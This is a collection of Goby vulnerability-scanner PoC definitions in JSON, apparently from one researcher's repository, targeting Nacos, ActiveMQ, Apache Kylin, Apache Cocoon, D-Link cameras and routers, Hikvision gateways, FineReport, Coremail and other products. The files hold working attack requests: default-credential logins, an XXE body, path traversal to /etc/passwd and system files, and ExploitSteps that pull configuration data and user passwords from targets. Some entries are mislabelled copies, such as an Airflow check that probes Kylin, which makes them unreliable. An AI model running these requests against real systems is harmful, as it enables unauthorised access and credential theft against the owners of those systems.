", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "OR", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/nacos/v1/auth/users/login", 23 | "follow_redirect": false, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "username=nacos&password=nacos" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | } 41 | ] 42 | }, 43 | "SetVariable": [] 44 | }, 45 | { 46 | "Request": { 47 | "method": "POST", 48 | "uri": "/v1/auth/users/login", 49 | "follow_redirect": true, 50 | "header": { 51 | "Content-Type": "application/x-www-form-urlencoded" 52 | }, 53 | "data_type": "text", 54 | "data": "username=nacos&password=nacos" 55 | }, 56 | "ResponseTest": { 57 | "type": "group", 58 | "operation": "AND", 59 | "checks": [ 60 | { 61 | "type": "item", 62 | "variable": "$code", 63 | "operation": "==", 64 | "value": "200", 65 | "bz": "" 66 | } 67 | ] 68 | }, 69 | "SetVariable": [] 70 | } 71 | ], 72 | "PostTime": "2021-01-25 15:46:58", 73 | "GobyVersion": "1.8.237" 74 | } -------------------------------------------------------------------------------- /json/Apache ActiveMQ Console控制台弱口令.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache ActiveMQ Console控制台弱口令", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "app=\"Apache-ActiveMQ\"", 8 | "Description": "Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用", 9 | "Product": "Apache ActiveMQ", 10 | "Homepage": "http://activemq.apache.org/", 11 | "Author": "PeiQi", 12 | "Impact": "咩咩咩🐑
", 13 | "Recommandation": "undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/admin", 23 | "follow_redirect": true, 24 | "header": { 25 | "Authorization": "Basic YWRtaW46YWRtaW4=" 26 | }, 27 | "data_type": "text", 28 | "data": "" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "Version", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-01-21 22:11:54", 54 | "GobyVersion": "1.8.237" 55 | } -------------------------------------------------------------------------------- /json/Apache Cocoon Xml 注入 CVE-2020-11991.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Cocoon Xml 注入 CVE-2020-11991", 3 | "Level": "1", 4 | "Tags": [ 5 | "XML注入" 6 | ], 7 | "GobyQuery": "app=\"Apache-Cocoon\"", 8 | "Description": "9月11日 Apache 软件基金会发布安全公告,修复了 Apache Cocoon xml外部实体注入漏洞(CVE-2020-11991)。\n\nApache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架,在这种框架下的所有处理都被预先定义好的处理组件线性连接起来,能够将输入和产生的输出按照流水线顺序处理。用户群:Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等,Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n\nApache Cocoon <= 2.1.12", 9 | "Product": "Apache Cocoon", 10 | "Homepage": "http://cocoon.apache.org/2.1/", 11 | "Author": "PeiQi", 12 | "Impact": "咩咩咩🐑
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/v2/api/product/manger/getInfo", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-type": "text/xml" 26 | }, 27 | "data_type": "text", 28 | "data": "\n ]>\n咩咩咩🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/kylin/api/user/authentication", 24 | "follow_redirect": true, 25 | "header": { 26 | "Authorization": "Basic YWRtaW46S1lMSU4=", 27 | "Cookie": "project=null" 28 | }, 29 | "data_type": "text", 30 | "data": "" 31 | }, 32 | "ResponseTest": { 33 | "type": "group", 34 | "operation": "AND", 35 | "checks": [ 36 | { 37 | "type": "item", 38 | "variable": "$code", 39 | "operation": "==", 40 | "value": "200", 41 | "bz": "" 42 | }, 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "!=", 47 | "value": "401", 48 | "bz": "" 49 | } 50 | ] 51 | }, 52 | "SetVariable": [] 53 | } 54 | ], 55 | "ExploitSteps": [ 56 | "AND", 57 | { 58 | "Request": { 59 | "method": "GET", 60 | "uri": "/kylin/api/user/authentication", 61 | "follow_redirect": true, 62 | "header": { 63 | "Authorization": "Basic YWRtaW46S1lMSU4=", 64 | "Cookie": "project=null" 65 | }, 66 | "data_type": "text", 67 | "data": "" 68 | }, 69 | "SetVariable": [ 70 | "output|lastbody" 71 | ] 72 | } 73 | ], 74 | "PostTime": "2021-01-24 13:23:42", 75 | "GobyVersion": "1.8.237" 76 | } -------------------------------------------------------------------------------- /json/Apache Kylin 未授权配置泄露 CVE-2020-13937.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Kylin 未授权配置泄露 CVE-2020-13937", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"APACHE-kylin\"", 8 | "Description": "Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息。\nhttp://xxx.xxx.xxx.xxx/kylin/api/admin/config\n\nApahche Kylin 2.x.x\nApahche Kylin <= 3.1.0\nApahche Kylin 4.0.0-alpha", 9 | "Product": "Apache Kylin", 10 | "Homepage": "http://kylin.apache.org/cn/", 11 | "Author": "PeiQi", 12 | "Impact": "咩咩咩🐏
", 13 | "Recommandation": "undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "Config", 21 | "type": "select", 22 | "value": "/kylin/api/admin/config", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/kylin/api/admin/config", 32 | "follow_redirect": true, 33 | "header": {}, 34 | "data_type": "text", 35 | "data": "" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "config", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "/kylin/api/admin/config", 66 | "follow_redirect": true, 67 | "header": {}, 68 | "data_type": "text", 69 | "data": "" 70 | }, 71 | "SetVariable": [ 72 | "output|lastbody" 73 | ] 74 | } 75 | ], 76 | "PostTime": "2021-01-24 13:03:37", 77 | "GobyVersion": "1.8.237" 78 | } -------------------------------------------------------------------------------- /json/Apache_ActiveMQ_Console_Weak_Password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache ActiveMQ_Console Weak Password", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "app=\"Apache-ActiveMQ\"", 8 | "Description": "Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用", 9 | "Product": "Apache ActiveMQ", 10 | "Homepage": "http://activemq.apache.org/", 11 | "Author": "PeiQi", 12 | "Impact": "咩咩咩🐑
", 13 | "Recommandation": "undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/admin", 23 | "follow_redirect": true, 24 | "header": { 25 | "Authorization": "Basic YWRtaW46YWRtaW4=" 26 | }, 27 | "data_type": "text", 28 | "data": "" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "Version", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-01-21 22:11:54", 54 | "GobyVersion": "1.8.230" 55 | } -------------------------------------------------------------------------------- /json/Apache_Airflow_Unauthorized.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Airflow Unauthorized", 3 | "Level": "3", 4 | "Tags": [ 5 | "Unauthorized" 6 | ], 7 | "GobyQuery": "app=\"APACHE-Airflow\"", 8 | "Description": "remote attacker to gain unauthorized access to a targeted system", 9 | "Product": "APACHE-Airflow", 10 | "Homepage": "https://airflow.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs
An attacker can log into the admin back end as an administrator and carry out further attacks
", 13 | "Recommandation": "undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/kylin/api/user/authentication", 23 | "follow_redirect": true, 24 | "header": { 25 | "Authorization": "Basic YWRtaW46S1lMSU4=", 26 | "Cookie": "project=null" 27 | }, 28 | "data_type": "text", 29 | "data": "" 30 | }, 31 | "ResponseTest": { 32 | "type": "group", 33 | "operation": "AND", 34 | "checks": [ 35 | { 36 | "type": "item", 37 | "variable": "$code", 38 | "operation": "==", 39 | "value": "200", 40 | "bz": "" 41 | }, 42 | { 43 | "type": "item", 44 | "variable": "$code", 45 | "operation": "!=", 46 | "value": "401", 47 | "bz": "" 48 | } 49 | ] 50 | }, 51 | "SetVariable": [] 52 | } 53 | ], 54 | "PostTime": "2021-04-04 15:51:21", 55 | "GobyVersion": "1.8.255" 56 | } -------------------------------------------------------------------------------- /json/Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Atlassian Jira 信息泄露漏洞 CVE-2020-14181", 3 | "Level": "0", 4 | "Tags": [], 5 | "GobyQuery": "(app=\"JIRA\" || title=\"System Dashboard\")", 6 | "Description": "Jira存在一个未授权访问漏洞,未授权的用户可以通过一个api接口直接查询到某用户名的存在情况,该接口不同于CVE-2019-8446和CVE-2019-3403的接口,是一个新的接口。如果Jira暴露在公网中,未授权用户就可以直接访问该接口爆破出潜在的用户名。", 7 | "Product": "Jira", 8 | "Homepage": "https://ones.ai/", 9 | "Author": "PeiQi", 10 | "Impact": "🐏
User names can be brute-forced through this interface, revealing which user names are valid
Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。
undefined
", 12 | "References": [ 13 | "https://github.com/lichti/shodan-portainer/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/api/users/admin/check", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "404", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-03-20 12:49:52", 43 | "GobyVersion": "1.8.255" 44 | } -------------------------------------------------------------------------------- /json/China_Mobile_Yu_Routing_Sensitive_Information_Leaks_Vulnerability.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "中国移动 禹路由 敏感信息泄露漏洞", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"中移\"", 6 | "Description": "中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "luckying", 10 | "Impact": "", 11 | "Recommandation": "undefined
", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/cgi-bin/ExportSettings.sh", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$body", 33 | "operation": "contains", 34 | "value": "Password", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-06-29 17:19:25", 43 | "GobyVersion": "1.8.268" 44 | } -------------------------------------------------------------------------------- /json/China_Mobile_Yu_routed_the_login_bypass.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "中国移动 禹路由 登录绕过", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"中移\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "luckying", 10 | "Impact": "", 11 | "Recommandation": "undefined
", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/simple-index.asp", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$body", 33 | "operation": "contains", 34 | "value": "无线密码", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-06-29 17:19:37", 43 | "GobyVersion": "1.8.268" 44 | } -------------------------------------------------------------------------------- /json/Consul_Rexec_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Consul Rexec RCE", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "protocol=\"consul(http)\"", 8 | "Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request", 9 | "Product": "Consul", 10 | "Homepage": "https://www.consul.io/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.exploit-db.com/exploits/46073" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/v1/agent/self", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | 
"value": "\"DisableRemoteExec\":false", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [ 56 | "output|lastbody|regex|" 57 | ] 58 | } 59 | ], 60 | "PostTime": "2021-11-08 21:46:25", 61 | "GobyVersion": "1.8.302" 62 | } -------------------------------------------------------------------------------- /json/Coremail_configuration_information_disclosure.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Coremail configuration information disclosure", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"Coremail\"", 8 | "Description": "There is a configuration information leakage vulnerability in an interface of COREMAIL, including port, configuration information, etc", 9 | "Product": "Coremail", 10 | "Homepage": "https://www.coremail.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "There is a configuration information leakage vulnerability in an interface of COREMAIL, including port, configuration information, etc
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/mailsms/s?func=ADMIN:appState&dumpConfig=/", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "configHome", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-14 20:51:04", 52 | "GobyVersion": "1.8.258" 53 | } -------------------------------------------------------------------------------- /json/Couchdb_Unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Couchdb Unauth", 3 | "Level": "3", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "app=\"APACHE-CouchDB\"", 8 | "Description": "remote attacker to gain unauthorized access to a targeted system", 9 | "Product": "APACHE-CouchDB", 10 | "Homepage": "http://couchdb.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "Allows remote attackers to execute arbitrary code
🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/login.cgi", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "user=admin&password=admin" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "not contains", 45 | "value": "flag=0", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-02-07 23:13:20", 54 | "GobyVersion": "1.8.237" 55 | } -------------------------------------------------------------------------------- /json/D-Link DCS系列监控 CNVD-2020-25078.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078", 3 | "Level": "1", 4 | "Tags": [ 5 | "账号密码泄露" 6 | ], 7 | "GobyQuery": "(app=\"DLink-Network-Camera\" || title=\"Document Error: Unauthorized\")", 8 | "Description": "D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面", 9 | "Product": "DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/config/getuser?index=0", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "name", 45 | "bz": "" 46 | }, 47 | { 48 | "type": "item", 49 | "variable": "$body", 50 | "operation": "contains", 51 | "value": "pass", 52 | "bz": "" 53 | } 54 | ] 55 | }, 56 | "SetVariable": [] 57 | } 58 | ], 59 | "ExploitSteps": [ 60 | "AND", 61 | { 62 | "Request": { 63 | "method": "GET", 64 | "uri": "/config/getuser?index=0", 65 | "follow_redirect": true, 66 | "header": {}, 67 | "data_type": "text", 68 | "data": "" 69 | }, 70 | "SetVariable": [ 71 | "output|lastbody" 72 | ] 73 | } 74 | ], 75 | "PostTime": "2021-03-29 14:08:02", 76 | "GobyVersion": "1.8.237" 77 | } -------------------------------------------------------------------------------- /json/D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078", 3 | "Level": "1", 4 | "Tags": [ 5 | "账号密码泄露" 6 | ], 7 | "GobyQuery": "(app=\"DLink-Network-Camera\" || title=\"Document Error: Unauthorized\")", 8 | "Description": "D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面", 9 | "Product": "DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/config/getuser?index=0", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "name", 45 | "bz": "" 46 | }, 47 | { 48 | "type": "item", 49 | "variable": "$body", 50 | "operation": "contains", 51 | "value": "pass", 52 | "bz": "" 53 | } 54 | ] 55 | }, 56 | "SetVariable": [] 57 | } 58 | ], 59 | "ExploitSteps": [ 60 | "AND", 61 | { 62 | "Request": { 63 | "method": "GET", 64 | "uri": "/config/getuser?index=0", 65 | "follow_redirect": true, 66 | "header": {}, 67 | "data_type": "text", 68 | "data": "" 69 | }, 70 | "SetVariable": [ 71 | "output|lastbody" 72 | ] 73 | } 74 | ], 75 | "PostTime": "2021-03-29 14:08:02", 76 | "GobyVersion": "1.8.237" 77 | } -------------------------------------------------------------------------------- /json/D_Link_AC_Centralized_management_system__Default_weak_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link AC Centralized management system Default weak password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default weak password" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"D-Link路由器管理页\" && app=\"DLink-Router\"", 8 | "Description": "D-Link AC management system has default account password, which can be used to obtain sensitive information (admin/admin)", 9 | "Product": "D-Link AC management system", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "Access to sensitive information
undefined
", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../../../../../../../../../../../etc¤tUserName=admin¤tUserId=1&isWebReport=true", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "etc/passwd", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-06-12 22:55:02", 50 | "GobyVersion": "1.8.268" 51 | } -------------------------------------------------------------------------------- /json/HIKVISION 视频编码设备接入网关 任意文件下载.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "HIKVISION 视频编码设备接入网关 任意文件下载", 3 | "Level": "1", 4 | "Tags": [ 5 | "任意文件下载" 6 | ], 7 | "GobyQuery": "(app=\"Hikvision-Video-coding-device-access-gateway\" || title=\"视频编码设备接入网关\")", 8 | "Description": "海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞\n\n访问 http://xxx.xxx.xxx.xxx/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php 下载文件", 9 | "Product": "HIKVISION 视频编码设备接入网关", 10 | "Homepage": "https://www.hikvision.com/cn/", 11 | "Author": "PeiQi", 12 | "Impact": "🐏
", 13 | "Recommandation": "undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "Filename", 21 | "type": "select", 22 | "value": "../web/html/data/saveUserInfo.php,../../../../../../WINDOWS/system32/drivers/etc/hosts,../web/html/serverLog/downFile.php", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php", 32 | "follow_redirect": true, 33 | "header": {}, 34 | "data_type": "text", 35 | "data": "" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "$file_name=", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "/serverLog/downFile.php?fileName={{{Filename}}}", 66 | "follow_redirect": true, 67 | "header": {}, 68 | "data_type": "text", 69 | "data": "" 70 | }, 71 | "SetVariable": [ 72 | "output|lastbody" 73 | ] 74 | } 75 | ], 76 | "PostTime": "2021-02-06 14:59:46", 77 | "GobyVersion": "1.8.237" 78 | } -------------------------------------------------------------------------------- /json/Hsmedia_Hgateway_Default_account.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link AC Centralized management system Default weak password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default weak password" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"D-Link路由器管理页\" && app=\"DLink-Router\"", 8 | "Description": "D-Link AC management system has default account password, which can be used to obtain sensitive information (admin/admin)", 9 | "Product": "D-Link AC management 
system", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "Access to sensitive information
Through this vulnerability, an attacker can obtain the router account password and take over the router
undefined
", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/action/usermanager.htm", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "pwd", 45 | "bz": "" 46 | } 47 | ] 48 | }, 49 | "SetVariable": [] 50 | } 51 | ], 52 | "ExploitSteps": [ 53 | "AND", 54 | { 55 | "Request": { 56 | "method": "GET", 57 | "uri": "/action/usermanager.htm", 58 | "follow_redirect": true, 59 | "header": {}, 60 | "data_type": "text", 61 | "data": "" 62 | }, 63 | "SetVariable": [ 64 | "output|lastbody" 65 | ] 66 | } 67 | ], 68 | "PostTime": "2021-04-04 23:23:15", 69 | "GobyVersion": "1.8.255" 70 | } -------------------------------------------------------------------------------- /json/JingHe_OA_C6_Default_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "JingHe OA C6 Default password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default password" 6 | ], 7 | "GobyQuery": "app=\"Jinher-OA\"", 8 | "Description": "JinHe OA C6 has the default account password of admin/000000, and the attacker will log in as an administrator", 9 | "Product": "JingHe OA C6", 10 | "Homepage": "jinher.com", 11 | "Author": "PeiQi", 12 | "Impact": "The 